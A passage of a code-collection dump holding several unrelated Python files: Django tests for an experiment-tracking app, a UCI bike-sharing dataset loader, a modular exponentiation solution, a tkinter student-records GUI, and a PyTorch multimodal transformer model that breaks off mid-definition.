models.Sequence(generator=gen,\n params=json.dumps(seq_params), task=task)\n seq_rec.save()\n print(seq_rec)\n\n task_rec = models.Task.objects.get(name='test_vfb')\n te = models.TaskEntry(task=task_rec, subject=subj)\n te.save()\n\n seq, seq_params = seq_rec.get()\n\n # Start the task\n base_class = task.get_base_class()\n Task = experiment.make(base_class, feats=[])\n\n params = json_param.Parameters.from_dict(dict(window_size=(480, 240)))\n params.trait_norm(Task.class_traits())\n\n saveid = te.id\n task_start_data = dict(subj=subj.id, base_class=base_class, feats=[Autostart],\n params=dict(window_size=(480, 240)), seq=seq_rec, seq_params=seq_params,\n saveid=saveid)\n\n tracker = tasktrack.Track.get_instance()\n tracker.runtask(cli=True, **task_start_data)\n\n\nclass TestTaskStartStop(TestCase):\n def test_start_experiment_python(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n task_start_data = dict(subj=subj.id, base_class=task.get_base_class(), feats=[],\n params=dict())\n\n # task_start_data = dict(subj=1, task=1, feats=dict(), params=dict(), sequence=None)\n tracker = tasktrack.Track.get_instance()\n tracker.runtask(cli=True, **task_start_data)\n\n time.sleep(5)\n tracker.stoptask()\n\n def test_start_experiment_ajax(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n task_start_data = dict(subject=1, task=1, feats=dict(), params=dict(), sequence=None)\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n self.assertTrue(tracker.task_running())\n\n # check the 'state' of the task\n self.assertEqual(tracker.task_proxy.get_state(), \"wait\")\n\n # update report stats\n tracker.task_proxy.update_report_stats()\n\n # access report stats\n reportstats = tracker.task_proxy.reportstats\n self.assertTrue(len(reportstats.keys()) > 0)\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\n def test_start_experiment_with_features(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n feat = models.Feature(name=\"saveHDF\", import_path=\"features.hdf_features.SaveHDF\")\n feat.save()\n\n task_start_data = dict(subject=1, task=1, feats={\"saveHDF\":\"saveHDF\"}, params=dict(), sequence=None)\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n self.assertTrue(tracker.task_running())\n\n # check the 'state' of the task\n self.assertEqual(tracker.task_proxy.get_state(), \"wait\")\n\n # update report stats\n tracker.task_proxy.update_report_stats()\n\n # access report stats\n reportstats = tracker.task_proxy.reportstats\n self.assertTrue(len(reportstats.keys()) > 0)\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\nclass TestTaskAnnotation(TestCase):\n def test_annotate_experiment(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.mocks.MockSequenceWithGenerators\")\n task.save()\n\n models.Generator.populate()\n\n feat = models.Feature(name=\"saveHDF\", import_path=\"features.hdf_features.SaveHDF\")\n feat.save()\n\n task_start_data = dict(subject=1, task=1, feats={\"saveHDF\":\"saveHDF\"}, params=dict(),\n sequence=dict(generator=1, name=\"seq1\", params=dict(n_targets=1000), static=False))\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n h5file = tracker.task_proxy.get_h5_filename()\n self.assertTrue(tracker.task_running())\n\n time.sleep(2)\n c.post(\"/exp_log/record_annotation\", dict(annotation=\"test post annotation\"))\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\n # check that the annotation is recorded in the HDF5 file\n import h5py\n hdf = h5py.File(h5file)\n self.assertTrue(b\"annotation: test post annotation\" in hdf[\"/task_msgs\"][\"msg\"][:])\n\n\nclass TestParamCast(TestCase):\n def test_norm_trait(self):\n from tracker import json_param\n from riglib.experiment import traits\n\n t = traits.Float(1, descr='test trait')\n t1 = json_param.norm_trait(t, 1.0)\n self.assertEqual(t1, 1.0)\n\n #self.assertRaises(Exception, json_param.norm_trait, t, '1.0')\n","repo_name":"carmenalab/brain-python-interface","sub_path":"db/tracker/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"40746070810","text":"\"\"\"Bike sharing dataset from the UCI machine learning repository.\"\"\"\n\nfrom __future__ import annotations\n\nfrom io import BytesIO\nfrom typing import Optional, Tuple\nfrom zipfile import ZipFile\n\nimport pandas as pd\nfrom probnum import backend\nimport requests\n\nfrom ._uci_dataset import UCIDataset\n\n\nclass BikeSharing(UCIDataset):\n \"\"\"Bike sharing dataset (17,379 × 16). [1]_\n\n This dataset contains the hourly (and daily) count of rental bikes between years\n 2011 and 2012 of the Capital bikeshare system with the corresponding weather and\n seasonal information.\n\n Source: https://archive.ics.uci.edu/ml/datasets/bike+sharing+dataset\n\n References\n ----------\n .. [1] Fanaee-T, Hadi, and Gama, Joao, \"Event labeling combining ensemble detectors\n and background knowledge\", Progress in Artificial Intelligence (2013): pp.\n 1-15, Springer Berlin Heidelberg, doi:10.1007/s13748-013-0040-3.\n \"\"\"\n\n URL = \"https://archive.ics.uci.edu/ml/machine-learning-databases/00275/\"\n\n def __init__(self, dir: Optional[str] = \"data/uci/bike\", overwrite: bool = False):\n super().__init__(dir, overwrite)\n\n @staticmethod\n def _download() -> backend.Array:\n # Download and unzip archive\n r = requests.get(BikeSharing.URL + \"Bike-Sharing-Dataset.zip\")\n files = ZipFile(BytesIO(r.content))\n\n # Read data for the hourly count\n df = pd.read_csv(files.open(\"hour.csv\"))\n\n # Convert dates to numeric\n df[\"dteday\"] = pd.to_datetime(df[\"dteday\"]).astype(int)\n\n return backend.asarray(df)\n\n @staticmethod\n def _preprocess(\n raw_data: backend.Array,\n ) -> Tuple[backend.Array, backend.Array, backend.Array, backend.Array]:\n\n # Preprocess\n X = raw_data[:, 0:-1]\n y = raw_data[:, -1]\n\n # Transform outputs\n y = backend.log(y)\n y = y - backend.mean(y, axis=0)\n\n # Normalize features\n X = (X - backend.mean(X, axis=0)) / backend.std(X, axis=0)\n\n # Select train-test split\n train_idcs = UCIDataset._get_train_idcs(\n rng_state=backend.random.rng_state(2494), num_data=X.shape[0]\n )\n\n return X, y, train_idcs\n","repo_name":"JonathanWenger/itergp","sub_path":"src/itergp/datasets/uci/_bike_sharing.py","file_name":"_bike_sharing.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"35983355864","text":"\na, b, c = list(map(int, input().split()))\n\n\ndef solution(a, b, c):\n result = a\n series = []\n while b != 1:\n series.append(b)\n if b % 2:\n b -= 1\n else:\n b = int(b//2)\n while series:\n s = series.pop()\n if s % 2:\n result = (result * a) % c\n else:\n result = (result ** 2) % c\n return result % c\n\n\nprint(solution(a, b, c))\n","repo_name":"TERADA-DANTE/algorithm","sub_path":"python/acmicpc/solved/_1629.py","file_name":"_1629.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22863459216","text":"import DB_Funct\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\nfrom PIL import ImageTk, Image\r\nimport re\r\n\r\ndef viewALL():\r\n records = DB_Funct.View()\r\n #print(records)\r\n clearTree()# clear before displaying\r\n for row in records:\r\n tv.insert(\"\", 0, values=row)\r\n'''\r\ndef validateName(name):\r\n if not re.match(\"^[a-z]*$\", name):\r\n print(\"Only Alphabet Allowed\")\r\n'''\r\n\r\n \r\n#def validateMark():\r\n \r\n'''\r\ndef validateActive():\r\n''' \r\n\r\ndef dbAdd():\r\n name = studentName_field.get()\r\n #validateName(name)\r\n lName = studentLName_field.get()\r\n imgL = imgLoc_field.get()\r\n mark = mark_field.get()\r\n #if mark0 != '':\r\n # mark=mark0\r\n active = active_field.get()\r\n #print(name,lName,imgL,mark, active)\r\n DB_Funct.Add(name,lName,imgL,mark, active)\r\n reset()\r\n \r\ndef update():\r\n ID = studentID_field.get()\r\n name = studentName_field.get()\r\n lName = studentLName_field.get()\r\n imgL = imgLoc_field.get()\r\n mark = mark_field.get()\r\n active = active_field.get()\r\n #print(name,lName,imgL,mark, active)\r\n DB_Funct.Update(ID,name,lName,imgL,mark, active)\r\n reset()\r\n\r\ndef search():\r\n ID = studentID_field.get()\r\n name = studentName_field.get()\r\n lName = studentLName_field.get()\r\n active = active_field.get()\r\n mark = mark_field.get()\r\n data = DB_Funct.Search(ID,name, lName, active, mark)\r\n clearTree()\r\n for row in data:\r\n tv.insert(\"\", 0, values=row)\r\n \r\n \r\ndef reset():\r\n setDefaultImage()\r\n clearTree()\r\n viewALL()\r\n clearTop()\r\n\r\n\r\ndef insertTree():\r\n for row in list:\r\n tv.insert(\"\", 0, values=row)\r\n #tv.insert('',END,values=row)\r\ndef clearTree():\r\n x = tv.get_children()\r\n \r\n for item in x:\r\n tv.delete(item)\r\n setDefaultImage()\r\ndef deleteLine():\r\n ID = studentID_field.get()\r\n #print(ID,\"to be deleted\")\r\n DB_Funct.Delete(ID)\r\n reset()\r\n \r\ndef clearTop():\r\n studentID_field.delete(0,END)\r\n studentName_field.delete(0,END)\r\n studentLName_field.delete(0,END)\r\n mark_field.delete(0, END)\r\n active_field.delete(0, END)\r\n imgLoc_field.delete(0, END)\r\n setDefaultImage()\r\n\r\n\r\ndef select_item(event):\r\n row = tv.item(tv.selection())\r\n #print(\"row\",type(row),row)\r\n item = tv.selection()[0]\r\n #print ('item clicked ', item)\r\n #print (tv.item(item)['values'][0])\r\n studentID_field.delete(0,END)\r\n studentName_field.delete(0,END)\r\n studentLName_field.delete(0,END)\r\n mark_field.delete(0, END)\r\n active_field.delete(0, END)\r\n imgLoc_field.delete(0, END)\r\n studentID_field.insert(END,row['values'][0])\r\n studentName_field.insert(END,row['values'][1])\r\n studentLName_field.insert(END,row['values'][2])\r\n imgLoc_field.insert(END,row['values'][3])\r\n mark_field.insert(END,row['values'][4])\r\n active_field.insert(END,row['values'][5])\r\n pic = imgLoc_field.get()\r\n imgChange(pic)\r\n '''\r\n img=ImageTk.PhotoImage(Image.open('img/'+ pic).resize((120,120)))\r\n photoHolder.configure(image=img)\r\n photoHolder.image = img\r\n '''\r\n#changes images\r\ndef imgChange(pic):\r\n try:\r\n img=ImageTk.PhotoImage(Image.open('img/'+ pic).resize((120,120)))\r\n photoHolder.configure(image=img)\r\n photoHolder.image = img\r\n except FileNotFoundError:\r\n errorImg()\r\n except IsADirectoryError:\r\n errorImg()\r\n\r\ndef errorImg():\r\n holder=\" - No Such File\"\r\n #default=ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120)))\r\n #photoHolder.configure(image=default)\r\n #photoHolder.image = default\r\n setDefaultImage()\r\n imgLoc_field.insert(END,holder)\r\n\r\ndef setDefaultImage():\r\n default=ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120)))\r\n photoHolder.configure(image=default)\r\n photoHolder.image = default\r\n \r\n#def errorInput():\r\n \r\n'''\r\n\r\ndef imageSwap():\r\n \r\n img = ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120))) #\"img/\"+str(pic)\r\n \r\n ''' \r\n\r\n \r\n\r\n \r\n\r\nwin = Tk()\r\n#Background\r\nwin.title(\"Student Record\")\r\nwin.geometry(\"950x400\")\r\nwin.configure(background='LightGreen')\r\n#Student Frame\r\nstudentFrame = LabelFrame(win, text='Student')\r\nstudentFrame.configure(background='LightBlue2')\r\nstudentFrame.grid(row=0, column=0,sticky=NSEW, padx=8, pady=8)\r\n#row/column set the position.\r\n#padx/y deal with the padding of the element\r\n\r\n\r\n\r\n\r\n\r\n#Student Name\r\nstudentName = Label(studentFrame,text='First Name: ')\r\nstudentName.grid(row=0, column=1, padx=8)\r\nstudent_text = StringVar()\r\nstudentName_field = Entry(studentFrame,textvariable=student_text)\r\nstudentName_field.grid(row=0, column=2, padx=5)\r\n\r\n#Student Surname\r\n\r\nstudentLName = Label(studentFrame,text='Last Name: ')\r\nstudentLName.grid(row=2, column=1, pady=8)\r\nstudentLName_text = StringVar()\r\nstudentLName_field = Entry(studentFrame,textvariable=studentLName_text)\r\nstudentLName_field.grid(row=2, column=2)\r\n\r\n#Image Location\r\n\r\nimgLoc = Label(studentFrame,text='Image Loc: ')\r\nimgLoc.grid(row=3, column=1, pady=8)\r\nimgLoc_text = StringVar()\r\nimgLoc_field = Entry(studentFrame,textvariable=imgLoc_text)\r\nimgLoc_field.grid(row=3, column=2)\r\n\r\n#Photo Placeholder\r\n#photo=imgLoc_field.get()\r\n#print(photo)\r\nopenImage = Image.open('img/eye.jpg') #'img/eye.jpg'\r\nimg=ImageTk.PhotoImage(openImage.resize((120,120)))\r\nphotoHolder = Label(studentFrame, image = img)\r\nphotoHolder.grid(row=0, column=0, rowspan=5, pady = 2, padx=2)\r\n\r\n#Student ID\r\nstudentID = Label(studentFrame,text='Student ID: ')\r\nstudentID.grid(row=0, column=3, padx=2)\r\nstudentID_text = StringVar()\r\nstudentID_field = Entry(studentFrame,textvariable=studentID_text)\r\nstudentID_field.grid(row=0, column=4, padx=8)\r\n\r\n#Mark\r\nmark = Label(studentFrame,text='Mark: ')\r\nmark.grid(row=2, column=3, padx=15)\r\nmark_text = StringVar()\r\nmark_field = Entry(studentFrame,textvariable=mark_text)\r\nmark_field.grid(row=2, column=4, padx=8)\r\n\r\n#Active\r\nactive = Label(studentFrame,text='Active: ')\r\nactive.grid(row=3, column=3, padx=8)\r\nactive_text = StringVar()\r\nactive_field = Entry(studentFrame,textvariable=active_text)\r\nactive_field.grid(row=3, column=4)\r\n\r\n\r\n\r\n\r\n#buttons\r\nbtnFrame = LabelFrame(win,text='Action:')\r\nbtnFrame.configure(background='DarkViolet')\r\nbtnFrame.grid(row=0, column=3,sticky=NSEW,rowspan = 8, padx=8,pady=8)\r\nb1=Button(btnFrame,text=\"View all\",width=16, height=2, command=viewALL)\r\nb1.grid(row=0, column=0, pady=4)\r\n\r\nb2=Button(btnFrame,text=\"Search Entry\",width=16, height=2, command=search)\r\nb2.grid(row=3, column=0, pady=4)\r\n\r\nb3=Button(btnFrame,text=\"Add Entry\",width=16, height=2, command=dbAdd)\r\nb3.grid(row=4, column=0, pady=4)\r\n\r\nb4=Button(btnFrame,text=\"Update\",width=16, height=2, command=update)\r\nb4.grid(row=5, column=0, pady=4)\r\n\r\nb5=Button(btnFrame,text=\"Delete\",width=16, height=2, command=deleteLine)\r\nb5.grid(row=6, column=0, pady=4)\r\n\r\nb6=Button(btnFrame,text=\"Close\",width=16, height=2, command=win.destroy)\r\nb6.grid(row=7, column=0, padx = 6, pady=4)\r\n\r\nb7=Button(btnFrame,text=\"Clear Display\",width=16, height=2, command=clearTree)\r\nb7.grid(row=2, column=0, pady=4)\r\n\r\nb8=Button(btnFrame,text=\"Clear Student\",width=16, height=2, command=clearTop)\r\nb8.grid(row=1, column=0, pady=4)\r\n\r\n#win.mainloop()\r\n\r\n\r\n#Version 3\r\n\r\n\r\ndispFrame = LabelFrame(win, text='Display:')\r\ndispFrame.configure(background='Pink')\r\ndispFrame.grid(row=1, column=0, sticky=NSEW, padx=8, pady=8)\r\ntv = ttk.Treeview(dispFrame, height=10, columns=3)\r\ntv.grid(row=1, column=1, columnspan=6)\r\ntv[\"columns\"] = [\"Student ID\", \"First Name\", \"Last Name\", \"Image Loc\", \"Mark\", \"Active\"]\r\ntv[\"show\"] = \"headings\"\r\ntv.heading(\"Student ID\", text=\"Student ID\")\r\ntv.column(\"Student ID\", anchor='center', width=120)\r\ntv.heading(\"First Name\", text=\"First Name\")\r\ntv.column(\"First Name\", anchor='center', width=120)\r\ntv.heading(\"Last Name\", text=\"Last Name\")\r\ntv.column(\"Last Name\", anchor='center', width=120)\r\ntv.heading(\"Image Loc\", text=\"Image Loc\")\r\ntv.column(\"Image Loc\", anchor='center', width=120)\r\ntv.heading(\"Mark\", text=\"Mark\")\r\ntv.column(\"Mark\", anchor='center', width=120)\r\ntv.heading(\"Active\", text=\"Active\")\r\ntv.column(\"Active\", anchor='center', width=120)\r\n\r\n\r\n#Scrollbar\r\nsb1 = Scrollbar(dispFrame,command=tv.yview,\r\norient=VERTICAL)\r\nsb1.grid(row=0,column=7,rowspan=2,sticky='ns')\r\ntv.configure(yscrollcommand=sb1.set)\r\n\r\n#CONNECTING DISPLAY FRAMES\r\n\r\n\r\ntv.bind('<>', select_item)\r\n\r\n#tv.bind('', select_item)\r\n#tv.bind('', select_item)\r\n#tv.bind('', select_item)\r\n#tv.bind('<1>', imgChange)\r\n\r\n\r\nwin.mainloop()\r\n\r\n\r\n\r\n\r\n","repo_name":"dim6ata/StudentRecords","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18022634833","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport math, copy\nimport numpy as np\nfrom basemodel_1D import TemporalConvNet\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef generate_mask_bidirectional(size, atten_len_a, atten_len_b):\n attn_shape = (1, size, size)\n past_all_mask = np.triu(np.ones(attn_shape), k=atten_len_b).astype('uint8')\n past_all_mask = torch.from_numpy(past_all_mask)\n past_all_mask = past_all_mask == 0\n past_all_mask = past_all_mask.byte()\n no_need_mask = np.triu(np.ones(attn_shape), k=-atten_len_a + 1).astype('uint8')\n no_need_mask = torch.from_numpy(no_need_mask)\n gene_mask = no_need_mask * past_all_mask\n\n return gene_mask.to(device)\n\n\n\ndef clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features)).to(device)\n self.b_2 = nn.Parameter(torch.zeros(features)).to(device)\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, layer, N):\n super(Encoder, self).__init__()\n self.layers = layer\n self.norm = LayerNorm(layer[0].size)\n\n def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass MultiModalEncoder(nn.Module):\n\n def __init__(self, layer, N, modal_num):\n super(MultiModalEncoder, self).__init__()\n self.modal_num = modal_num\n self.layers = layer\n self.norm = nn.ModuleList()\n for i in range(self.modal_num):\n self.norm.append(LayerNorm(layer[0].size))\n\n\n def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.norm[i](_x[i]))\n\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\nclass SublayerConnection(nn.Module):\n\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n\n return x + self.dropout(sublayer(self.norm(x)))\n\n\nclass MultiModalSublayerConnection(nn.Module):\n\n def __init__(self, size, modal_num, dropout):\n super(MultiModalSublayerConnection, self).__init__()\n self.modal_num = modal_num\n\n self.norm = nn.ModuleList()\n for i in range(self.modal_num):\n self.norm.append(LayerNorm(size))\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n residual = x\n\n _x_list = []\n _x = torch.chunk(x, self.modal_num, -1)\n for i in range(self.modal_num):\n _x_list.append(self.norm[i](_x[i]))\n x = torch.cat(_x_list, dim=-1)\n\n return self.dropout(sublayer(x)) + residual\n\n\nclass EncoderLayer(nn.Module):\n\n def __init__(self, size, self_attn, feed_forward, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = nn.ModuleList()\n self.sublayer.append(SublayerConnection(size, dropout))\n self.sublayer.append(SublayerConnection(size, dropout))\n\n self.size = size\n\n def forward(self, x, mask):\n\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\n\nclass MultiModalEncoderLayer(nn.Module):\n\n def __init__(self, size, modal_num, mm_atten, mt_atten, feed_forward, dropout):\n super(MultiModalEncoderLayer, self).__init__()\n self.modal_num = modal_num\n\n self.mm_atten = mm_atten\n self.mt_atten = mt_atten\n self.feed_forward = feed_forward\n\n mm_sublayer = MultiModalSublayerConnection(size, modal_num, dropout)\n mt_sublayer = nn.ModuleList()\n for i in range(modal_num):\n mt_sublayer.append(SublayerConnection(size, dropout))\n ff_sublayer = nn.ModuleList()\n for i in range(modal_num):\n ff_sublayer.append(SublayerConnection(size, dropout))\n\n self.sublayer = nn.ModuleList()\n self.sublayer.append(mm_sublayer)\n self.sublayer.append(mt_sublayer)\n self.sublayer.append(ff_sublayer)\n\n self.size = size\n\n def forward(self, x, mask):\n x = self.sublayer[0](x, lambda x: self.mm_atten(x, x, x))\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n feature = self.sublayer[1][i](_x[i], lambda x: self.mt_atten[i](x, x, x, mask[i]))\n feature = self.sublayer[2][i](feature, self.feed_forward[i])\n _x_list.append(feature)\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\ndef attention(query, key, value, mask=None, dropout=None):\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n\n self.d_k = d_model // h\n self.h = h\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, mask=None):\n\n if mask is not None:\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n\n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n\n x, _ = attention(query, key, value, mask=mask, dropout=self.dropout)\n\n x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\n\nclass MultiModalAttention(nn.Module):\n def __init__(self, h, d_model, modal_num, dropout=0.1):\n\n super(MultiModalAttention, self).__init__()\n assert d_model % h == 0\n\n self.d_k = d_model // h\n self.h = h\n\n self.modal_num = modal_num\n self.mm_linears = nn.ModuleList()\n for i in range(self.modal_num):\n linears = clones(nn.Linear(d_model, d_model), 4)\n self.mm_linears.append(linears)\n\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, mask=None):\n query = torch.chunk(query, self.modal_num, dim=-1)\n key = torch.chunk(key, self.modal_num, dim=-1)\n value = torch.chunk(value, self.modal_num, dim=-1)\n\n if mask is not None:\n mask = mask.unsqueeze(1)\n nbatches = query[0].size(0)\n\n _query_list = []\n _key_list = []\n _value_list = []\n for i in range(self.modal_num):\n _query_list.append(self.mm_linears[i][0](query[i]).view(nbatches, -1, self.h, self.d_k))\n _key_list.append(self.mm_linears[i][1](key[i]).view(nbatches, -1, self.h, self.d_k))\n _value_list.append(self.mm_linears[i][2](value[i]).view(nbatches, -1, self.h, self.d_k))\n\n mm_query = torch.stack(_query_list, dim=-2)\n mm_key = torch.stack(_key_list, dim=-2)\n mm_value = torch.stack(_value_list, dim=-2)\n x, _ = attention(mm_query, mm_key, mm_value, mask=mask, dropout=self.dropout)\n\n x = x.transpose(-2, -3).contiguous().view(nbatches, -1, self.modal_num, self.h * self.d_k)\n _x = torch.chunk(x, self.modal_num, dim=-2)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.mm_linears[i][-1](_x[i].squeeze()))\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\nclass PositionwiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\n\nclass SEmbeddings(nn.Module):\n def __init__(self, d_model, dim):\n super(SEmbeddings, self).__init__()\n self.lut = nn.Linear(dim, d_model)\n self.d_model = d_model\n\n def forward(self, x):\n x = self.lut(x)\n x = x * math.sqrt(self.d_model)\n return x\n\n\nclass TEmbeddings(nn.Module):\n def __init__(self, opts, dim):\n super(TEmbeddings, self).__init__()\n self.levels = opts.levels\n self.ksize = opts.ksize\n self.d_model = opts.d_model\n self.dropout = opts.dropout\n\n self.channel_sizes = [self.d_model] * self.levels\n self.lut = TemporalConvNet(dim, self.channel_sizes, kernel_size=self.ksize, dropout=self.dropout)\n\n def forward(self, x):\n x = self.lut(x.transpose(1, 2)).transpose(1, 2) * math.sqrt(self.d_model)\n\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len).unsqueeze(1)\n v = torch.arange(0, d_model, 2).type(torch.float)\n v = v * -(math.log(1000.0) / d_model)\n div_term = torch.exp(v)\n pe[:, 0::2] = torch.sin(position.type(torch.float) * div_term)\n pe[:, 1::2] = torch.cos(position.type(torch.float) * div_term)\n pe = pe.unsqueeze(0).to(device)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\n\nclass ProcessInput(nn.Module):\n def __init__(self, opts, dim):\n super(ProcessInput, self).__init__()\n\n if opts.embed == 'spatial':\n self.Embeddings = SEmbeddings(opts.d_model, dim)\n elif opts.embed == 'temporal':\n self.Embeddings = TEmbeddings(opts, dim)\n self.PositionEncoding = PositionalEncoding(opts.d_model, opts.dropout_position, max_len=5000)\n\n def forward(self, x):\n return self.PositionEncoding(self.Embeddings(x))\n\n\nclass TE(nn.Module):\n\n def __init__(self, opts, num_features):\n super(TE, self).__init__()\n\n self.modal_num = opts.modal_num\n assert self.modal_num == 1, 'TE model is only used for single feature streams ...'\n\n self.mask_a_length = int(opts.mask_a_length)\n self.mask_b_length = int(opts.mask_b_length)\n\n self.N = opts.block_num\n self.dropout = opts.dropout\n self.h = opts.h\n self.d_model = opts.d_model\n self.d_ff = opts.d_ff\n\n self.input = ProcessInput(opts, num_features)\n\n self.regress = nn.Sequential(\n nn.Linear(self.d_model, self.d_model // 2),\n nn.ReLU(),\n nn.Linear(self.d_model // 2, opts.ntarget)\n )\n self.dropout_embed = nn.Dropout(p=opts.dropout_embed)\n\n encoder_layer = nn.ModuleList()\n for i in range(self.N):\n atten = MultiHeadedAttention(self.h, self.d_model, self.dropout)\n ff = PositionwiseFeedForward(self.d_model, self.d_ff, self.dropout)\n encoder_layer.append(EncoderLayer(self.d_model, atten, ff, self.dropout))\n self.te = Encoder(encoder_layer, self.N)\n\n for p in self.te.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.input.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.regress.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, x):\n x = self.input(x)\n x = self.dropout_embed(x)\n\n mask = generate_mask_bidirectional(x.shape[1], self.mask_a_length, self.mask_b_length)\n x = self.te(x, mask)\n\n return self.regress(x)\n\n\nclass TEMMA(nn.Module):\n\n def __init__(self, opts, num_features):\n super(TEMMA, self).__init__()\n\n self.modal_num = opts.modal_num\n assert self.modal_num > 1, 'TEMMA model is only used for multiple feature streams ...'\n\n self.mask_a_length = [int(l) for l in opts.mask_a_length.split(',')]\n self.mask_b_length = [int(l) for l in opts.mask_b_length.split(',')]\n\n self.num_features = num_features\n self.modal_num = opts.modal_num\n self.N = opts.block_num\n self.dropout_mmatten = opts.dropout_mmatten\n self.dropout_mtatten = opts.dropout_mtatten\n self.dropout_ff = opts.dropout_ff\n self.dropout_subconnect = opts.dropout_subconnect\n self.h = opts.h\n self.h_mma = opts.h_mma\n self.d_model = opts.d_model\n self.d_ff = 